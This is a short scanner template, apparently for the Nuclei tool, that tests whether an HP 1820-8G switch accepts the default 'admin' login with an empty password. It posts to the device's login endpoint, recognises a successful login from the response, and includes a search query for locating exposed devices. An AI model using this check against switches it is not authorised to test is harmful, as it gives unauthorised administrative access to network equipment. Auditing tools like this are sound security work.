id: hp-switch-default-login
info:
  name: HP 1820-8G Switch J9979A Default Credential
  author: pussycat0x
  severity: high
  reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
  metadata:
    fofa-query: 'HP 1820-8G Switch J9979A'
  tags: default-login,hp

requests:
  - raw:
      - |
          POST /htdocs/login/login.lua HTTP/1.1
          Host: {{Hostname}}

          username={{username}}&password=

    payloads:
      username:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"redirect": "/htdocs/pages/main/main.lsp"'
          - '"error": ""'

      - type: status
        status:
          - 200
